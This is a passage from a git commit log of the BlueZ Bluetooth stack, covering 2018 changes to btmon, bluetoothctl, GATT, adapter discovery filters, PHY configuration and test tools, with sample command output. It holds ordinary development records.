 #2  packet_monitor (tv=0x7fffffffda50, cred=<optimized out>, index=<optimized out>, opcode=<optimized out>, data=0x7fffffffda60, size=<optimized out>) at monitor/packet.c:3881
 #3  0x000000000040e177 in control_reader (path=<optimized out>, pager=true) at monitor/control.c:1462
 #4  0x0000000000403b00 in main (argc=<optimized out>, argv=<optimized out>) at monitor/main.c:243

Change-Id: I1c3bf298ebfb11f5cace8c245d30fdc068bc6606
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/shell: Fix parsing of tool name
Luiz Augusto von Dentz [Mon, 8 Oct 2018 07:35:53 +0000 (10:35 +0300)]
shared/shell: Fix parsing of tool name

Fix leaving leading '/' when parsing tool name.

Change-Id: Ifc7fd6fde54923e64d25c1a33e1d16c873f86732
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agounit: Make use of tester_monitor to print input/output PDUs
Luiz Augusto von Dentz [Fri, 5 Oct 2018 08:50:46 +0000 (11:50 +0300)]
unit: Make use of tester_monitor to print input/output PDUs

tester_monitor will forward the data to btmon when -m/--monitor is
enabled which will attempt to decode the PDUs:

= test-gatt: /robustness/unkown-command - init                                                                                                                        11:44:53.464325
= test-gatt: /robustness/unkown-command - setup
= test-gatt: /robustness/unkown-command - setup complete
= test-gatt: /robustness/unkown-command - run
< test-gatt: User Data TX
      ATT: Exchange MTU Request (0x02) len 2
        Client RX MTU: 23
> test-gatt: User Data RX
      ATT: Exchange MTU Response (0x03) len 2
        Server RX MTU: 512
< test-gatt: User Data TX
      ATT: Unknown (0xff) len 1
        00                                               .
= test-gatt: /robustness/unkown-command - test passed
= test-gatt: /robustness/unkown-command - teardown
= test-gatt: /robustness/unkown-command - teardown complete
= test-gatt: /robustness/unkown-command - done

Change-Id: I44bd1f913f02a953301dc1e0a4b87a448219e7f0
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/tester: Add option to print to monitor
Luiz Augusto von Dentz [Thu, 4 Oct 2018 13:09:22 +0000 (16:09 +0300)]
shared/tester: Add option to print to monitor

This adds option -m/--monitor that can be used together with
tester_monitor to send protocol data to be decoded by btmon.

In addition to that this also logs the tester output into btmon since
that has support to store its output on file this can be quite
convenient for reporting.

Change-Id: Ie5f3c6fef0f0f590111ddd0bf36485345e2e317f
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomonitor: Add support for user input/output data
Luiz Augusto von Dentz [Fri, 5 Oct 2018 08:47:47 +0000 (11:47 +0300)]
monitor: Add support for user input/output data

This detects if the user logging is an input/output and then proceed to
decode the header which inform for which CID and PSM the data is for.

Change-Id: Idc21d2f1473f4b77569cea49c4a8ccd6c5e7c78a
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogatt: Fix not cleaning up device state properly
Luiz Augusto von Dentz [Mon, 1 Oct 2018 11:10:08 +0000 (14:10 +0300)]
gatt: Fix not cleaning up device state properly

If the device is removed locally device_free would end up calling
bt_att_unref which won't trigger any disconnect callback necessary
to remove device states.

Change-Id: Iab0990928a64453dd5dfa8f519f8f88a1148dd59
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogatt: Fix attempting to create device on disconnection
Luiz Augusto von Dentz [Tue, 2 Oct 2018 08:18:31 +0000 (11:18 +0300)]
gatt: Fix attempting to create device on disconnection

If ATT is disconnected and the state points to an invalid device it
must have been destroyed in the meantime and should not be recreated.

Change-Id: I60d5bafb0130188ce718b38a02e8008b151a5750
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/att: Reset fd when disconnected
Luiz Augusto von Dentz [Mon, 1 Oct 2018 12:05:15 +0000 (15:05 +0300)]
shared/att: Reset fd when disconnected

Set att->fd to -1 when considered disconnected.

Change-Id: I1b9f28d5aabb7947234e7cf9128b86fe07a6edd7
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/shell: Set rl_readline_name
Luiz Augusto von Dentz [Wed, 12 Sep 2018 10:25:56 +0000 (13:25 +0300)]
shared/shell: Set rl_readline_name

Set rl_readline_name so the binary name can be used in inputrc.

Change-Id: I1e49901db95dca3c89e0fb3815541afe90b62945
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/shell: Print commands when --help option is given
Luiz Augusto von Dentz [Fri, 7 Sep 2018 08:07:11 +0000 (11:07 +0300)]
shared/shell: Print commands when --help option is given

This enables the user to see what command could be given in the
non-interactive mode e.g:

> bluetooth-player --help
bluetooth-player ver 5.50
Usage:
bluetooth-player [--options] [commands]
Options:
--timeout  Timeout in seconds for non-interactive mode
--version  Display version
--help  Display help
Commands:
list List available players
show Player information
select Select default player
play Start playback
pause Pause playback
stop Stop playback
next Jump to next item
previous Jump to previous item
fast-forward Fast forward playback
rewind Rewind playback
equalizer Enable/Disable equalizer
repeat Set repeat mode
shuffle Set shuffle mode
scan Set scan mode
change-folder Change current folder
list-items List items of current folder
search Search items containing string
queue Add item to playlist queue
show-item Show item information

Change-Id: Ibb9572f6a9bc13e3a5bf43ebddc40c1642d6b1bc
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agounit: Fix out of bounds
Luiz Augusto von Dentz [Mon, 27 Aug 2018 11:37:33 +0000 (14:37 +0300)]
unit: Fix out of bounds

Test /gobex/test_stream_put_req requires 5 buffers to complete.

Change-Id: I277cdcfc8c396598cb609bbf16e7944e94bc3ae0
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmgmt: Add support to accept multiple PHY options
Anupam Roy [Wed, 22 Aug 2018 14:42:55 +0000 (20:12 +0530)]
btmgmt: Add support to accept multiple PHY options

Before fix-
  [hci1]# phy 1MTX 1MRX 2MTX
  Too many arguments: 3 > 1

After Fix-
  [hci1]# phy 1MRX 1MTX 2MTX
  PHY Configuration successfully set

 btmon output -
 @ MGMT Command: Set PHY Configuration (0x0045) plen 4
         Selected PHYs: 0x0e00
           LE 1M TX
           LE 1M RX
           LE 2M TX
 < HCI Command: LE Set Default PHY (0x08|0x0031) plen 3
         All PHYs preference: 0x00
         TX PHYs preference: 0x03
           LE 1M
           LE 2M
         RX PHYs preference: 0x01
           LE 1M
 > HCI Event: Command Complete (0x0e) plen 4
        LE Set Default PHY (0x08|0x0031) ncmd 1
         Status: Success (0x00)
 @ MGMT Event: Command Complete (0x0001) plen 3
        Set PHY Configuration (0x0045) plen 0
         Status: Success (0x00)
 @ MGMT Event: PHY Configuration Changed (0x0026) plen 4
         Selected PHYs: 0x0e00
           LE 1M TX
           LE 1M RX
           LE 2M TX

Change-Id: I22e38e6d381b4c5aefc5a38314fd188874c7d83e
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodoc/adapter-api: Fix working of Discoverable filter
Luiz Augusto von Dentz [Wed, 1 Aug 2018 13:08:36 +0000 (16:08 +0300)]
doc/adapter-api: Fix working of Discoverable filter

Change-Id: Id74bd073c6a1da41ac7a01b6719442b781ad5d0c
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoclient: Fix not resetting filters on scan.clear
Luiz Augusto von Dentz [Wed, 1 Aug 2018 11:21:55 +0000 (14:21 +0300)]
client: Fix not resetting filters on scan.clear

If call to SetDiscoveryFilter comes with any value set the daemon will
not attempt to clear the filters, instead the client is suppose to send
an empty dict.

Change-Id: Iff02f62e999e0e292b645a8d300320226fa17105
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoclient: Commit changes to scan filter if active
Luiz Augusto von Dentz [Mon, 30 Jul 2018 11:11:38 +0000 (14:11 +0300)]
client: Commit changes to scan filter if active

This detects if the command scan has been triggered and if so commit
changes to filter immediately so they take effect in the current
session.

Change-Id: Iec94318c40a7fd17d281dbc7ccfc54be740e0f60
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoadapter: Fix not keeping discovery filters
Luiz Augusto von Dentz [Thu, 26 Jul 2018 14:13:12 +0000 (17:13 +0300)]
adapter: Fix not keeping discovery filters

If the discovery has been stopped and the client has set filters those
should be put back into filter list since the client may still be
interested in using them the next time it start a scanning.

Change-Id: Ie0b0594b61f5976a802cd537692363c76f16394a
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoclient: Add scan.clear discoverable
Luiz Augusto von Dentz [Thu, 26 Jul 2018 12:40:55 +0000 (15:40 +0300)]
client: Add scan.clear discoverable

This implements scan.clear for discoverable filter.

Change-Id: I0fe8d6c6ba54be0ae37479edd88f47a4b71012c5
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoclient: Add scan.discoverable command
Luiz Augusto von Dentz [Thu, 26 Jul 2018 12:26:30 +0000 (15:26 +0300)]
client: Add scan.discoverable command

This adds discoverable command to scan menu which can be used to set
if adapter should become discoverable while scanning:

[bluetooth]# scan.discoverable on
[bluetooth]# scan on
SetDiscoveryFilter success
[CHG] Controller XX:XX:XX:XX:XX:XX Discoverable: yes
Discovery started
[CHG] Controller XX:XX:XX:XX:XX:XX Discovering: yes
[bluetooth]# scan off
Discovery stopped
[CHG] Controller XX:XX:XX:XX:XX:XX Discoverable: no

Change-Id: Ica34e2bc17c72460b5fd41e8104cff2bb5fa0234
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoadapter: Discovery filter discoverable
Luiz Augusto von Dentz [Thu, 26 Jul 2018 12:23:05 +0000 (15:23 +0300)]
adapter: Discovery filter discoverable

This implements the discovery filter discoverable and tracks which
clients had enabled it and restores the settings when the last client
enabling it exits.

Change-Id: I5a81a3d9014fbf27e79d38e57b895da0aed68c64
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodoc/adapter-api: Add Discoverable option to SetDiscoveryFilter
Luiz Augusto von Dentz [Thu, 26 Jul 2018 12:15:12 +0000 (15:15 +0300)]
doc/adapter-api: Add Discoverable option to SetDiscoveryFilter

This enables the client to set its discoverable setting while
discovering which is very typical situation as usually the setings
application would allow incoming pairing request while scanning, so
this would reduce the number of calls setting Discoverable and
DiscoverableTimeout and restoring after done with discovery.

Change-Id: Ifa7763436795c78ff1499971235ab3d812801552
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomgmt-tester: Update Supported_settings to reflect PHY_CONFIGURATION
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:26 +0000 (15:51 +0530)]
mgmt-tester: Update Supported_settings to reflect PHY_CONFIGURATION

Change-Id: I7b7db32446914922bee471bc372a4266f8fb5945
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomgmt-tester: Add support ext create connection and enh conn complete
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:25 +0000 (15:51 +0530)]
mgmt-tester: Add support ext create connection and enh conn complete

Change-Id: I530bbf57ef32b76a8c2b62cf722fe62ac96c74be
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomgmt-tester: Add tests for extended scanning and device found
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:24 +0000 (15:51 +0530)]
mgmt-tester: Add tests for extended scanning and device found

Change-Id: Id848d995087c74edf220fd26b225707455eafe73
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomgmt-tester: Add PHY Configuration test cases
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:23 +0000 (15:51 +0530)]
mgmt-tester: Add PHY Configuration test cases

Change-Id: Id0cfcf2c935f872acf7016e422546b1dbba24269
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomgmt-tester: Add extended advertising test cases
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:22 +0000 (15:51 +0530)]
mgmt-tester: Add extended advertising test cases

Change-Id: Ifee5f87426349617ba8ca6067bc1c0f1a4f26b34
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoemulator: Add BREDR 2M & 3M, 3 & 5 Slot packet type support
Jaganath Kanakkassery [Wed, 25 Jul 2018 10:21:21 +0000 (15:51 +0530)]
emulator: Add BREDR 2M & 3M, 3 & 5 Slot packet type support

Change-Id: I807811ddb10174404f72447bd5541c6663dc7658
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoagent: Make the first agent to register the default
Luiz Augusto von Dentz [Fri, 27 Jul 2018 08:01:04 +0000 (11:01 +0300)]
agent: Make the first agent to register the default

This simplifies the handling of default agent and enforce the IO
capabilities to be set whenever there is an agent available in the
system.

Change-Id: I23b3fe9031d2d61ec2adeabf21af5d7a0f721a77
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agocore: Add AlwaysPairable to main.conf
Luiz Augusto von Dentz [Fri, 27 Jul 2018 08:14:04 +0000 (11:14 +0300)]
core: Add AlwaysPairable to main.conf

This adds a new option called AlwaysPairable to main.conf, it can be
used to enable Adapter.Pairable even in case there is no Agent
available.

Since that could be consider a security problem to allow pairing
without user's consent the option defaults to false.

Change-Id: I67e534d5e8a6490ed2c99950c629d6e1ab493e30
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoadapter: Check pending when setting DiscoverableTimeout
Luiz Augusto von Dentz [Wed, 25 Jul 2018 08:39:55 +0000 (11:39 +0300)]
adapter: Check pending when setting DiscoverableTimeout

This makes DiscoverableTimeout check if discoverable is already pending
and don't attempt to set it once again which may cause discoverable to
be re-enabled when in fact the application just want to set the timeout
alone.

Change-Id: I5ffb43845cf90698ed92e0d06301e77d4fbee8b7
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoadapter: Track pending settings
Luiz Augusto von Dentz [Wed, 25 Jul 2018 08:27:37 +0000 (11:27 +0300)]
adapter: Track pending settings

This tracks settings being changed and in case the settings is already
pending considered it to be done.

Change-Id: Id2d5be79d8a79e2cc2301ff998d46a60d321d219
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoclient: Make show command print DiscoverableTimeout
Luiz Augusto von Dentz [Wed, 25 Jul 2018 07:22:45 +0000 (10:22 +0300)]
client: Make show command print DiscoverableTimeout

Controller XX:XX:XX:XX:XX:XX (public)
Name: Vudentz's T460s
Alias: Intel-1
Class: 0x004c010c
Powered: yes
Discoverable: no
DiscoverableTimeout: 0x00000000
Pairable: yes
UUID: Headset AG                (00001112-0000-1000-8000-00805f9b34fb)
UUID: Generic Attribute Profile (00001801-0000-1000-8000-00805f9b34fb)
UUID: A/V Remote Control        (0000110e-0000-1000-8000-00805f9b34fb)
UUID: SIM Access                (0000112d-0000-1000-8000-00805f9b34fb)
UUID: Generic Access Profile    (00001800-0000-1000-8000-00805f9b34fb)
UUID: PnP Information           (00001200-0000-1000-8000-00805f9b34fb)
UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b34fb)
UUID: Audio Source              (0000110a-0000-1000-8000-00805f9b34fb)
UUID: Audio Sink                (0000110b-0000-1000-8000-00805f9b34fb)
UUID: Headset                   (00001108-0000-1000-8000-00805f9b34fb)
Modalias: usb:v1D6Bp0246d0532
Discovering: no

Change-Id: I6cdbeb4d6a62fc2243e6746056a96298c79801f3
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoclient: Add discoverable-timeout command
Luiz Augusto von Dentz [Tue, 24 Jul 2018 13:03:07 +0000 (16:03 +0300)]
client: Add discoverable-timeout command

This adds discoverable-timeout command which can be used to get/set
DiscoverableTimeout property:

[bluetooth]# discoverable-timeout 180
Changing discoverable-timeout 180 succeeded

Change-Id: I294e0facc8d69dc03766f7664a8f0de31fc94a9f
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agotools: Fix btmon-logger service unit
Andrzej Kaczmarek [Mon, 23 Jul 2018 20:31:58 +0000 (22:31 +0200)]
tools: Fix btmon-logger service unit

Bluetooth sockets can be only created in initial network namespace thus
btmon-logger will fail to open monitor socket with PrivateNetwork=true
since this sets up new network namespace for created process.

Change-Id: Iddb6eef006269b6f944d1af9b5de4a66cd9c7c9a
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoemulator: Fix unsupported command for WRITE_LE_HOST_SUPPORTED
Jaganath Kanakkassery [Thu, 26 Jul 2018 11:23:29 +0000 (16:53 +0530)]
emulator: Fix unsupported command for WRITE_LE_HOST_SUPPORTED

WRITE_LE_HOST_SUPPORTED command needs check for BTDEV_TYPE_LE as well.

Change-Id: I7e860ae650422141917bc9b9ccb9e27aa7a3a113
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomonitor: Allow Ellisys injection when reading from TTY
Andrzej Kaczmarek [Thu, 19 Jul 2018 18:34:30 +0000 (20:34 +0200)]
monitor: Allow Ellisys injection when reading from TTY

Change-Id: I3e132a9a557d5876327064dda1429b0818db8e9f
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodevice: Fix loading devices without Service Changed CCC
Andrzej Kaczmarek [Thu, 19 Jul 2018 14:44:09 +0000 (16:44 +0200)]
device: Fix loading devices without Service Changed CCC

This patch provides fix for loading devices which were saved before
support for storing Service Changed CCC was added (a0b886e26).

Without this fix, after daemon is upgraded from pre-a0b886e26 to
current version we do not indicate Service Changed to any previously
bonded device since "loaded" CCC value is 0. This means that even if
locla GATT database is changed, bonded peer can assume it did not
change and continue to access structure which yields unexpected
results and this is exactly what happens on iOS devices.

With this patch, if "ServiceChanged" group (added by mentioned commit)
does not exist in config file of a bonded device, we assume indications
for Service Changed characteristic value were enabled by peer as per
Core 5.0, Vol 3, Part G, 7.1:

  "This Characteristic Value shall be configured to be indicated,
   using the Client Characteristic Configuration descriptor by a
   client"

Change-Id: I9a06b3787460b4a62e5e948effc97bc4d3b9b5ab
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomonitor: Use BPF to filter packets by index
Luiz Augusto von Dentz [Thu, 19 Jul 2018 13:58:02 +0000 (16:58 +0300)]
monitor: Use BPF to filter packets by index

This uses a BPF filter to filter packets to specific index.

Change-Id: Ie73c025483c18a40de803e79a24e3a346d5156ce
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agocore: Set GATT.Cache default in init_defaults
Luiz Augusto von Dentz [Thu, 12 Jul 2018 17:01:13 +0000 (20:01 +0300)]
core: Set GATT.Cache default in init_defaults

Change-Id: I41a373066b0fd325981b2bbd03d014186053b10d
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodoc/gatt-api: Fix documentation of prepare-authorize
Luiz Augusto von Dentz [Thu, 12 Jul 2018 15:47:17 +0000 (18:47 +0300)]
doc/gatt-api: Fix documentation of prepare-authorize

Make it clearer what values it can assume and also fit in 80 columns.

Change-Id: Iae39d7c79d90673df27cadc9eb9b2d3049ec5e1b
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomain.conf: Rename MinEncKeySize to KeySize
Luiz Augusto von Dentz [Thu, 12 Jul 2018 15:29:47 +0000 (18:29 +0300)]
main.conf: Rename MinEncKeySize to KeySize

There is no conflicts, or other key/encryption related parameter, with
just calling this parameter KeySize so we don't have to just enter
initial for something one can assume it implicitly.

Change-Id: Ia2dceb976e35819864dd5b7899f2753698e42b31
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogatt: provide MTU in ReadValue and WriteValue
David Krauser [Mon, 9 Jul 2018 16:25:01 +0000 (12:25 -0400)]
gatt: provide MTU in ReadValue and WriteValue

This includes the MTU value in ReadValue and WriteValue when acting as
a server.

Note: The actual data can be bigger than the MTU in case of WriteValue
in case of Long Value is written with Prepare + Execute.

Change-Id: I718fe7378e5627aaf8c5680d5bf730c9b0f0ce0b
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogatt: Make ATT MTU configurable in main.conf
David Krauser [Mon, 9 Jul 2018 16:27:20 +0000 (12:27 -0400)]
gatt: Make ATT MTU configurable in main.conf

This adds a new entry to GATT group called ExchangeMTU.

Change-Id: Ia026190e18bc759cc565475e629143307e231413
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodoc/gatt-api: Add MTU to ReadValue and WriteValue
David Krauser [Mon, 9 Jul 2018 16:28:15 +0000 (12:28 -0400)]
doc/gatt-api: Add MTU to ReadValue and WriteValue

Change-Id: Ica225118d9aef841b5d893d5174853c58afb1e73
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodoc/mgmt-api: Add BREDR PHYs in PHY Configuration Commands
Jaganath Kanakkassery [Thu, 28 Jun 2018 06:16:50 +0000 (11:46 +0530)]
doc/mgmt-api: Add BREDR PHYs in PHY Configuration Commands

Change-Id: I94b243f25a6d4a4531e37f2f35e28d2542f00268
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agopolicy: Add logic to connect a Sink
Luiz Augusto von Dentz [Tue, 26 Jun 2018 10:37:33 +0000 (13:37 +0300)]
policy: Add logic to connect a Sink

If HFP/HSP HS connects and the device also supports a Sink connect it
as well since some devices (e.g. Sony MW600) may not connect it
automatically.

Change-Id: Ie328028bc5ef7751e501ff056521114bf4385117
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoemulator: Add 5.0 feature support
Jaganath Kanakkassery [Thu, 14 Jun 2018 12:21:20 +0000 (17:51 +0530)]
emulator: Add 5.0 feature support

This adds new hciemu for BT 5.0. Also adds extended advertising,
scanning and connection support in btdev and bthost

Change-Id: Ifb49b0e088b2d7bacc9a09c1989aa4c8b1a6cd2c
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomonitor: Add support for Secondary PHY flags in Add Advertising
Jaganath Kanakkassery [Thu, 14 Jun 2018 12:21:18 +0000 (17:51 +0530)]
monitor: Add support for Secondary PHY flags in Add Advertising

Change-Id: I8f09089d0fa373d43b1d0eb249b730e9bb0326ad
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodoc/mgmt-api: Add advertising phys support to flags
Jaganath Kanakkassery [Thu, 14 Jun 2018 12:21:15 +0000 (17:51 +0530)]
doc/mgmt-api: Add advertising phys support to flags

Change-Id: Ie0941101f8d0cfbd7c0ac0f306c06ef95f663176
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodoc/mgmt-api: Add support for Set Phy Configuration command
Jaganath Kanakkassery [Thu, 14 Jun 2018 12:21:14 +0000 (17:51 +0530)]
doc/mgmt-api: Add support for Set Phy Configuration command

This also adds PHY Configuration Changed Event.

Change-Id: I30900e4dbed3a1282ad87baa6fda610283af2c00
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtsnoop: Enable SCO packets for Packet Logger format
Marcel Holtmann [Sat, 16 Jun 2018 23:05:05 +0000 (01:05 +0200)]
btsnoop: Enable SCO packets for Packet Logger format

Change-Id: Ib04155a4d3a482c3b365d2bbba0c950569fcdf4b
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomonitor: Add support for decoding Broadcom Enable WBS command
Marcel Holtmann [Sat, 16 Jun 2018 20:53:04 +0000 (22:53 +0200)]
monitor: Add support for decoding Broadcom Enable WBS command

Change-Id: I215bb5976a287ae5544927902c400b032a3ac984
Signed-off-by: himanshu <h.himanshu@samsung.com>